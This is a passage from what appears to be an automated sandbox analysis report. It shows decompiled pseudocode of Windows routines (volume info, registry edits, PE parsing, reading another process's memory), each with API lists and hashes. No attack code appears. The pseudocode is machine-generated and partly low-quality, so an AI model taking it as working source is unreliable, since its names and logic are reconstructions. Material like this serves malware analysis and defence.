					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E011E25D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0x1213cb8;
					if(_t54 == 0) {
						_t54 = 0x1213ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0x1213d00);
						if(_v790 == 0) {
							E011E274C();
							E011DC108(_t66, 0x235e, 1, 0x1213d00);
							_t81 = _t80 + 0x1c;
						} else {
							E011E274C();
							_push( &_v790);
							E011DC108(_t66, 0x235f, 2, 0x1213d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E011E274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E011DC108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E011E25D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E011DC5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E011E6FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}



































                                                    0x011f6b30
                                                    0x011f6b38
                                                    0x011f6b3e
                                                    0x011f6b45
                                                    0x011f6b4c
                                                    0x011f6b52
                                                    0x011f6b56
                                                    0x011f6b58
                                                    0x011f6b5f
                                                    0x011f6b64
                                                    0x011f6b67
                                                    0x011f6b6e
                                                    0x011f6b75
                                                    0x011f6b91
                                                    0x011f6b93
                                                    0x011f6b96
                                                    0x011f6b96
                                                    0x011f6b99
                                                    0x011f6b9c
                                                    0x011f6baa
                                                    0x011f6cc4
                                                    0x011f6cc9
                                                    0x011f6ccc
                                                    0x011f6ccd
                                                    0x00000000
                                                    0x011f6bcb
                                                    0x011f6bcf
                                                    0x011f6bd5
                                                    0x00000000
                                                    0x011f6bd5
                                                    0x011f6b77
                                                    0x011f6b77
                                                    0x011f6b7e
                                                    0x011f6b80
                                                    0x011f6b80
                                                    0x011f6b89
                                                    0x011f6bd7
                                                    0x011f6bd7
                                                    0x011f6bda
                                                    0x011f6bde
                                                    0x011f6be1
                                                    0x011f6c09
                                                    0x011f6c3a
                                                    0x011f6c3b
                                                    0x011f6c45
                                                    0x011f6c4a
                                                    0x011f6c4b
                                                    0x011f6c69
                                                    0x011f6c76
                                                    0x011f6c7b
                                                    0x011f6c4d
                                                    0x011f6c4d
                                                    0x011f6c56
                                                    0x011f6c5f
                                                    0x011f6c64
                                                    0x011f6c64
                                                    0x011f6c83
                                                    0x011f6c9c
                                                    0x011f6cb3
                                                    0x011f6cb8
                                                    0x011f6cbb
                                                    0x011f6c0b
                                                    0x011f6c10
                                                    0x011f6c16
                                                    0x011f6c1e
                                                    0x011f6c21
                                                    0x011f6c29
                                                    0x011f6c29
                                                    0x011f6c2b
                                                    0x011f6c2c
                                                    0x011f6ccf
                                                    0x011f6ccf
                                                    0x011f6cd7
                                                    0x011f6cd8
                                                    0x011f6c09
                                                    0x011f6ce0
                                                    0x011f6ce1
                                                    0x011f6cec

                                                    APIs
                                                    • towupper.MSVCRT ref: 011F6B89
                                                    • iswalpha.MSVCRT ref: 011F6BBC
                                                    • towupper.MSVCRT ref: 011F6BCF
                                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 011F6C01
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C16
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                    • String ID: :\$%04X-%04X
                                                    • API String ID: 4001382275-3541097225
                                                    • Opcode ID: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                                    • Instruction ID: 0c3c56ab88baa50d37139f89b05fd20c98300b6c5c9de13c38edc88f738beb76
                                                    • Opcode Fuzzy Hash: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                                    • Instruction Fuzzy Hash: A1412D72A04211AAD738EBA59C19FB777ECEFA8B14F00041DFA95C7180EB74D540C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 41%
                                                    			E011F587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0x11fc0e0);
				E011E7678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x11d24ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E011DC5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E011DC5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E011DC5A2(_t45);
						E011DC5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E011E25D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E011E76BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E011E7797(_t45) != 0) {
							 *0x121c020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}












                                                    0x011f587b
                                                    0x011f587b
                                                    0x011f587d
                                                    0x011f5882
                                                    0x011f5887
                                                    0x011f5889
                                                    0x011f588c
                                                    0x011f5893
                                                    0x011f5930
                                                    0x011f5936
                                                    0x011f5938
                                                    0x011f593d
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5953
                                                    0x011f5955
                                                    0x011f595a
                                                    0x011f597a
                                                    0x011f597c
                                                    0x011f5981
                                                    0x011f5983
                                                    0x011f5985
                                                    0x011f598b
                                                    0x011f598b
                                                    0x011f598f
                                                    0x011f595c
                                                    0x011f595f
                                                    0x011f5961
                                                    0x011f5963
                                                    0x011f5969
                                                    0x011f5969
                                                    0x011f595f
                                                    0x00000000
                                                    0x011f58a2
                                                    0x011f58b5
                                                    0x011f58b7
                                                    0x011f58bc
                                                    0x011f5913
                                                    0x011f5913
                                                    0x011f5914
                                                    0x011f5915
                                                    0x011f5922
                                                    0x00000000
                                                    0x011f58be
                                                    0x011f58be
                                                    0x011f58c1
                                                    0x011f58c3
                                                    0x011f58c6
                                                    0x011f58c6
                                                    0x011f58c9
                                                    0x011f58cc
                                                    0x011f58d3
                                                    0x011f58eb
                                                    0x011f58ed
                                                    0x011f58f3
                                                    0x011f58fb
                                                    0x00000000
                                                    0x00000000
                                                    0x011f58fd
                                                    0x011f5900
                                                    0x011f5906
                                                    0x011f5995
                                                    0x011f5997
                                                    0x011f59dc
                                                    0x011f59e3
                                                    0x011f59e3
                                                    0x011f5999
                                                    0x011f5999
                                                    0x011f59a3
                                                    0x011f59ad
                                                    0x011f59ad
                                                    0x011f59b3
                                                    0x00000000
                                                    0x011f59b3
                                                    0x011f58bc

                                                    APIs
                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5930
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F594D
                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5974
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F598F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseDeleteValue$CreateOpen
                                                    • String ID: %s=%s
                                                    • API String ID: 1019019434-1087296587
                                                    • Opcode ID: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                                    • Instruction ID: 85b48d7eeabf79c9d233efdde780bb9a860294e60f88be58d793f1591e34926a
                                                    • Opcode Fuzzy Hash: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                                    • Instruction Fuzzy Hash: 3D31B071D00615AAEB3D9B5A9C0DEAF7E79EF8AF64B05410CF90566250E7204E01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F53E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E011F53E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0x1218104 != 0) {
					L4:
					_t63 =  *0x1218100;
					L5:
					if(_t63 != 0) {
						 *0x12194b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E011F573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E011E6FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0x1218104 = _t47;
				if(_t47 == 0) {
					 *0x1218104 =  *0x1218104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0x1218100 = _t63;
					goto L5;
				}
			}























                                                    0x011f53e0
                                                    0x011f53eb
                                                    0x011f53f2
                                                    0x011f53fc
                                                    0x011f53fe
                                                    0x011f540b
                                                    0x011f5440
                                                    0x011f5440
                                                    0x011f5446
                                                    0x011f5448
                                                    0x011f545c
                                                    0x011f5466
                                                    0x011f546c
                                                    0x011f548f
                                                    0x011f54a0
                                                    0x011f54db
                                                    0x011f551a
                                                    0x011f551c
                                                    0x011f5523
                                                    0x011f5531
                                                    0x011f5531
                                                    0x011f5523
                                                    0x011f54ae
                                                    0x011f54b5
                                                    0x011f54b5
                                                    0x011f54a0
                                                    0x011f548f
                                                    0x011f5466
                                                    0x011f554e
                                                    0x011f554e
                                                    0x011f5414
                                                    0x011f541a
                                                    0x011f5421
                                                    0x011f5439
                                                    0x00000000
                                                    0x011f5423
                                                    0x011f542f
                                                    0x011f5431
                                                    0x00000000
                                                    0x011f5431

                                                    APIs
                                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 011F5414
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 011F5429
                                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 011F5487
                                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 011F54D3
                                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 011F54FA
                                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 011F5531
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                    • API String ID: 1580871199-2613899276
                                                    • Opcode ID: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                                    • Instruction ID: 2d2afdad2ff707ede3e1d5cbb998ba88fd6386d677440dfcc771fd4dd70a5b1b
                                                    • Opcode Fuzzy Hash: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                                    • Instruction Fuzzy Hash: 044187B1A001199BEB64CB25DC88B7E777EEB54648F00409DEB09E3245DB309E81CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E011D5DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E011E22C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0x1213cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0x1213cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

















                                                    0x011d5dbd
                                                    0x011d5dc6
                                                    0x011d5dc8
                                                    0x011d5dcf
                                                    0x011d5dd2
                                                    0x011d5dd5
                                                    0x011d5dd7
                                                    0x011d5ddd
                                                    0x011d5de8
                                                    0x011d5de8
                                                    0x011d5dec
                                                    0x011d5df3
                                                    0x011d5df3
                                                    0x011d5de1
                                                    0x011d5de6
                                                    0x011d5df6
                                                    0x011d5dfb
                                                    0x011d5dfe
                                                    0x011e9ce0
                                                    0x011e9ce3
                                                    0x011e9ced
                                                    0x011e9cf1
                                                    0x011e9cf1
                                                    0x011e9cf2
                                                    0x011d5e04
                                                    0x011d5e04
                                                    0x011d5e09
                                                    0x011d5e10
                                                    0x011d5e1a
                                                    0x011d5e6d
                                                    0x011d5e6d
                                                    0x011d5e1a
                                                    0x011d5e23
                                                    0x011d5e25
                                                    0x011d5e28
                                                    0x011d5e2e
                                                    0x011e9d0e
                                                    0x011e9d14
                                                    0x011e9d19
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9d1f
                                                    0x011e9d22
                                                    0x00000000
                                                    0x011d5e34
                                                    0x011d5e34
                                                    0x011d5e43
                                                    0x011d5e49
                                                    0x011d5e4e
                                                    0x011e9d36
                                                    0x011e9d3c
                                                    0x011e9d44
                                                    0x011e9d4a
                                                    0x011e9d4a
                                                    0x00000000
                                                    0x011e9d44
                                                    0x011d5e54
                                                    0x011d5e57
                                                    0x011d5e5d
                                                    0x011d5e64
                                                    0x011e9d2b
                                                    0x011e9d2b
                                                    0x00000000
                                                    0x011d5e64
                                                    0x011d5e2e
                                                    0x00000000

                                                    APIs
                                                    • _wcsicmp.MSVCRT ref: 011D5E10
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 011D5E43
                                                    • _open_osfhandle.MSVCRT ref: 011D5E57
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011E9D2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                    • String ID: con
                                                    • API String ID: 689241570-4257191772
                                                    • Opcode ID: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                                    • Instruction ID: d5e535bad670562cf576daf8d1995ffdf3640aac4a5b5a8043e3d48a8137f881
                                                    • Opcode Fuzzy Hash: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                                    • Instruction Fuzzy Hash: 15313932A00514AFE73CDAACA84DB6EBAFAE751639F210319E921E32C0DF704D018761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99memoryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E011F554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E011F5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E011F5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E011F5768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E011F5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E011F573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E011E6FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}




















                                                    0x011f554f
                                                    0x011f5557
                                                    0x011f555e
                                                    0x011f5564
                                                    0x011f5566
                                                    0x011f556a
                                                    0x011f558a
                                                    0x011f558f
                                                    0x011f564e
                                                    0x011f564e
                                                    0x00000000
                                                    0x011f564e
                                                    0x011f5597
                                                    0x011f55a3
                                                    0x011f55cb
                                                    0x011f55d7
                                                    0x011f55e4
                                                    0x011f55f0
                                                    0x011f55f2
                                                    0x011f55f9
                                                    0x011f560e
                                                    0x011f5612
                                                    0x011f5618
                                                    0x011f5624
                                                    0x011f5629
                                                    0x011f562b
                                                    0x011f5632
                                                    0x011f5634
                                                    0x011f5634
                                                    0x011f5632
                                                    0x011f5641
                                                    0x011f5641
                                                    0x011f5612
                                                    0x011f55f9
                                                    0x011f55f0
                                                    0x011f55d7
                                                    0x011f5648
                                                    0x00000000
                                                    0x011f556c
                                                    0x011f556c
                                                    0x011f5651
                                                    0x011f5661
                                                    0x011f5661

                                                    APIs
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 011F5584
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 011F55BE
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 011F5601
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F5608
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 011F563A
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F5641
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 011F5648
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                    • String ID: PE
                                                    • API String ID: 3093239467-4258593460
                                                    • Opcode ID: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                                    • Instruction ID: 72bdf582741cb09c69ab96785492e3546fa00ff7b84a992b2119fa9095647a1d
                                                    • Opcode Fuzzy Hash: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                                    • Instruction Fuzzy Hash: 3C31E534600214A7EF68A7696C0CFBE7AAB9B94B25F44021CFF61D65C4DF318942CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F84FE, Relevance: 13.6, APIs: 9, Instructions: 96fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E011F84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E011DDB92( *_t24);
				_t30 = E011D5DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L011E82C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E011DDB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E011D5DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E011DDB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E011DC5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}



















                                                    0x011f8505
                                                    0x011f8509
                                                    0x011f850d
                                                    0x011f8515
                                                    0x011f851b
                                                    0x011f851d
                                                    0x011f852d
                                                    0x011f852f
                                                    0x011f8534
                                                    0x011f854e
                                                    0x011f8557
                                                    0x011f855b
                                                    0x011f8563
                                                    0x011f856b
                                                    0x011f8575
                                                    0x011f857d
                                                    0x011f8585
                                                    0x011f8596
                                                    0x00000000
                                                    0x011f8598
                                                    0x011f8598
                                                    0x011f8599
                                                    0x011f859c
                                                    0x011f859f
                                                    0x011f85a4
                                                    0x011f85a6
                                                    0x011f85a9
                                                    0x011f85ab
                                                    0x011f85b2
                                                    0x00000000
                                                    0x011f85b4
                                                    0x011f85bb
                                                    0x011f85c0
                                                    0x011f85c5
                                                    0x00000000
                                                    0x011f85cb
                                                    0x011f85d0
                                                    0x011f85d8
                                                    0x011f85de
                                                    0x011f85de
                                                    0x011f85c5
                                                    0x011f85b2
                                                    0x011f8587
                                                    0x011f8587
                                                    0x011f8587
                                                    0x011f8589
                                                    0x011f858e
                                                    0x011f858e
                                                    0x00000000
                                                    0x011f858e
